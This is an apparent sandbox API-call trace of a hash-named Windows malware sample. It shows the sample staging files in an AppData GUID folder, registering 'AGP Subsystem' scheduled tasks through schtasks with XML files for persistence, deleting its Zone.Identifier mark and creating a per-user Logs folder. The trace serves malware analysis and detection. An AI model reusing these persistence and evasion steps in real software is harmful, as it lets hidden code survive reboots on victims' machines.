[0167.472] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0167.479] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\AGP Subsystem\\agpss.exe", nBufferLength=0x105, lpBuffer=0x28e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\AGP Subsystem\\agpss.exe", lpFilePart=0x0) returned 0x5f
[0167.479] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\AGP Subsystem\\agpss.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\agp subsystem\\agpss.exe")) returned 0
[0167.495] EtwEventRegister () returned 0x0
[0169.203] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e774, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0169.204] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e774, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0169.255] CoTaskMemAlloc (cb=0x20c) returned 0x7755a0
[0169.255] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7755a0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0169.255] CoTaskMemFree (pv=0x7755a0)
[0169.256] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x28e7ac, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13
[0169.258] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x28e7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x26
[0169.259] CoTaskMemAlloc (cb=0x20c) returned 0x7755a0
[0169.259] GetTempFileNameW (in: lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x7755a0 | out: lpTempFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpfd29.tmp")) returned 0xfd29
[0169.262] CoTaskMemFree (pv=0x7755a0)
[0169.266] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", nBufferLength=0x105, lpBuffer=0x28e670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", lpFilePart=0x0) returned 0x31
[0169.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28eb88) returned 1
[0169.266] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpfd29.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x27c
[0169.266] GetFileType (hFile=0x27c) returned 0x1
[0169.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28eb84) returned 1
[0169.266] GetFileType (hFile=0x27c) returned 0x1
[0169.268] WriteFile (in: hFile=0x27c, lpBuffer=0x28d19bc*, nNumberOfBytesToWrite=0x54e, lpNumberOfBytesWritten=0x28ec14, lpOverlapped=0x0 | out: lpBuffer=0x28d19bc*, lpNumberOfBytesWritten=0x28ec14*=0x54e, lpOverlapped=0x0) returned 1
[0169.270] CloseHandle (hObject=0x27c) returned 1
[0169.292] CoTaskMemAlloc (cb=0x20e) returned 0x7755a0
[0169.292] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7755a0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1a
[0169.292] CoTaskMemFree (pv=0x7755a0)
[0169.293] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"schtasks.exe\" /create /f /tn \"AGP Subsystem\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\Desktop", lpStartupInfo=0x28ea60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28d2ddc | out: lpCommandLine="\"schtasks.exe\" /create /f /tn \"AGP Subsystem\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp\"", lpProcessInformation=0x28d2ddc*(hProcess=0x280, hThread=0x27c, dwProcessId=0x7d0, dwThreadId=0x650)) returned 1
[0169.309] CloseHandle (hObject=0x27c) returned 1
[0169.310] GetCurrentProcess () returned 0xffffffff
[0169.310] GetCurrentProcess () returned 0xffffffff
[0169.311] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x28ec78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x28ec78*=0x27c) returned 1
[0169.312] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x2710, cHandles=0x1, pHandles=0x28ec70*=0x27c, lpdwindex=0x28ea94 | out: lpdwindex=0x28ea94) returned 0x0
[0169.967] CloseHandle (hObject=0x27c) returned 1
[0169.970] GetExitCodeProcess (in: hProcess=0x280, lpExitCode=0x28ecdc | out: lpExitCode=0x28ecdc*=0x0) returned 1
[0169.971] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", nBufferLength=0x105, lpBuffer=0x28e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", lpFilePart=0x0) returned 0x31
[0169.971] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpfd29.tmp")) returned 1
[0169.974] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e774, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0170.006] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\task.dat", nBufferLength=0x105, lpBuffer=0x28e680, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\task.dat", lpFilePart=0x0) returned 0x50
[0170.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28eb98) returned 1
[0170.007] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\task.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\task.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x27c
[0170.007] GetFileType (hFile=0x27c) returned 0x1
[0170.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28eb94) returned 1
[0170.008] GetFileType (hFile=0x27c) returned 0x1
[0170.008] WriteFile (in: hFile=0x27c, lpBuffer=0x28d4d74*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x28ec24, lpOverlapped=0x0 | out: lpBuffer=0x28d4d74*, lpNumberOfBytesWritten=0x28ec24*=0x5f, lpOverlapped=0x0) returned 1
[0170.010] CloseHandle (hObject=0x27c) returned 1
[0170.011] CoTaskMemAlloc (cb=0x20c) returned 0x780878
[0170.012] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x780878 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0170.012] CoTaskMemFree (pv=0x780878)
[0170.012] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x28e7ac, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13
[0170.012] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x28e7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x26
[0170.012] CoTaskMemAlloc (cb=0x20c) returned 0x780878
[0170.012] GetTempFileNameW (in: lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x780878 | out: lpTempFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmp17.tmp")) returned 0x17
[0170.013] CoTaskMemFree (pv=0x780878)
[0170.014] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", nBufferLength=0x105, lpBuffer=0x28e670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", lpFilePart=0x0) returned 0x2f
[0170.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28eb88) returned 1
[0170.014] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmp17.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x27c
[0170.014] GetFileType (hFile=0x27c) returned 0x1
[0170.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28eb84) returned 1
[0170.014] GetFileType (hFile=0x27c) returned 0x1
[0170.014] WriteFile (in: hFile=0x27c, lpBuffer=0x28d8864*, nNumberOfBytesToWrite=0x51d, lpNumberOfBytesWritten=0x28ec14, lpOverlapped=0x0 | out: lpBuffer=0x28d8864*, lpNumberOfBytesWritten=0x28ec14*=0x51d, lpOverlapped=0x0) returned 1
[0170.016] CloseHandle (hObject=0x27c) returned 1
[0170.018] CoTaskMemAlloc (cb=0x20e) returned 0x780878
[0170.018] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x780878 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1a
[0170.018] CoTaskMemFree (pv=0x780878)
[0170.018] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"schtasks.exe\" /create /f /tn \"AGP Subsystem Task\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\Desktop", lpStartupInfo=0x28ea58*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28d9b20 | out: lpCommandLine="\"schtasks.exe\" /create /f /tn \"AGP Subsystem Task\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp\"", lpProcessInformation=0x28d9b20*(hProcess=0x2b0, hThread=0x27c, dwProcessId=0x5e0, dwThreadId=0x3b8)) returned 1
[0170.026] CloseHandle (hObject=0x27c) returned 1
[0170.026] GetCurrentProcess () returned 0xffffffff
[0170.026] GetCurrentProcess () returned 0xffffffff
[0170.026] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x28ec78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x28ec78*=0x27c) returned 1
[0170.027] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x2710, cHandles=0x1, pHandles=0x28ec70*=0x27c, lpdwindex=0x28ea94 | out: lpdwindex=0x28ea94) returned 0x0
[0170.828] CloseHandle (hObject=0x27c) returned 1
[0170.828] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0x28ecdc | out: lpExitCode=0x28ecdc*=0x0) returned 1
[0170.828] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", nBufferLength=0x105, lpBuffer=0x28e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", lpFilePart=0x0) returned 0x2f
[0170.828] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmp17.tmp")) returned 1
[0170.838] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e780, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0170.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe:Zone.Identifier", cchWideChar=111, lpMultiByteStr=0x28ec74, cbMultiByte=113, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe:Zone.Identifierq\x93
6", lpUsedDefaultChar=0x0) returned 111
[0170.859] DeleteFileA (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe:Zone.Identifier" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe:zone.identifier")) returned 0
[0171.178] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\catalog.dat", nBufferLength=0x105, lpBuffer=0x28e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\catalog.dat", lpFilePart=0x0) returned 0x53
[0171.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e8c8) returned 1
[0171.179] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\catalog.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\catalog.dat"), fInfoLevelId=0x0, lpFileInformation=0x28eb8c | out: lpFileInformation=0x28eb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0171.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e8c4) returned 1
[0171.249] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\storage.dat", nBufferLength=0x105, lpBuffer=0x28e678, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\storage.dat", lpFilePart=0x0) returned 0x53
[0171.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e8b8) returned 1
[0171.249] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\storage.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\storage.dat"), fInfoLevelId=0x0, lpFileInformation=0x28eb7c | out: lpFileInformation=0x28eb7c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0171.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e8b4) returned 1
[0171.728] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e00, lpName=0x0) returned 0x2dc
[0171.728] memcpy (in: _Dst=0x3e0000, _Src=0x28aa574, _Size=0x4e00 | out: _Dst=0x3e0000) returned 0x3e0000
[0171.729] CloseHandle (hObject=0x2dc) returned 1
[0171.910] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", nBufferLength=0x105, lpBuffer=0x28e788, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", lpFilePart=0x0) returned 0x54
[0171.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9c8) returned 1
[0171.910] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bin"), fInfoLevelId=0x0, lpFileInformation=0x28ec8c | out: lpFileInformation=0x28ec8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0171.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9c4) returned 1
[0171.914] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak", nBufferLength=0x105, lpBuffer=0x28e64c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak", lpFilePart=0x0) returned 0x54
[0171.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e88c) returned 1
[0171.914] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bak"), fInfoLevelId=0x0, lpFileInformation=0x28eb50 | out: lpFileInformation=0x28eb50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0171.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e888) returned 1
[0172.255] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18800, lpName=0x0) returned 0x304
[0172.255] memcpy (in: _Dst=0x440000, _Src=0x38a90c8, _Size=0x18800 | out: _Dst=0x440000) returned 0x440000
[0172.257] CloseHandle (hObject=0x304) returned 1
[0172.873] GetUserNameW (in: lpBuffer=0x28e444, pcbBuffer=0x28e6bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x28e6bc) returned 1
[0173.386] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj", nBufferLength=0x105, lpBuffer=0x28e174, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj", lpFilePart=0x0) returned 0x56
[0173.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e33c) returned 1
[0173.386] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs\\keecfmwgj"), fInfoLevelId=0x0, lpFileInformation=0x28e600 | out: lpFileInformation=0x28e600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0173.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e338) returned 1
[0173.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e33c) returned 1
[0173.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs\\keecfmwgj"), fInfoLevelId=0x0, lpFileInformation=0x28e600 | out: lpFileInformation=0x28e600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0173.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e338) returned 1
[0173.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e33c) returned 1
[0173.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs"), fInfoLevelId=0x0, lpFileInformation=0x28e600 | out: lpFileInformation=0x28e600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0173.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e338) returned 1
[0173.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e33c) returned 1
[0173.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6"), fInfoLevelId=0x0, lpFileInformation=0x28e600 | out: lpFileInformation=0x28e600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdd692de0, ftCreationTime.dwHighDateTime=0x1d8a8be, ftLastAccessTime.dwLowDateTime=0xdee609e0, ftLastAccessTime.dwHighDateTime=0x1d8a8be, ftLastWriteTime.dwLowDateTime=0xdee609e0, ftLastWriteTime.dwHighDateTime=0x1d8a8be, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
[0173.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e338) returned 1
[0173.388] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs"), lpSecurityAttributes=0x0) returned 1
[0173.389] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs\\keecfmwgj"), lpSecurityAttributes=0x0) returned 1
[0173.465] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", nBufferLength=0x105, lpBuffer=0x28a558, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", lpFilePart=0x0) returned 0x66
[0173.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28a7a0) returned 1
